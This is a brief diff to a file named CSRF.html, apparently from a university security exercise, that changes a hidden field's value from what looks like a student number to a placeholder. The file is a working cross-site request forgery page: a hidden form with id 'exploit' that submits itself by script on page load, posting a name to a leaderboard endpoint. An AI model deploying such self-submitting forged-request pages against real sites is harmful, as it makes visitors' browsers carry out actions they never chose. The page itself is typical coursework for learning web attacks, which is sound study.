--- a/CSRF.html
+++ b/CSRF.html
@@ -1,7 +1,7 @@
 <html>
     <body>
         <form id = "exploit" action="https://message.uqcloud.net/leaderboard.php" method="POST">
-            <input type="hidden" name="name" value="s4696637" />
+            <input type="hidden" name="name" value="value" />
         </form>
         <script>
             document.getElementById("exploit").submit();
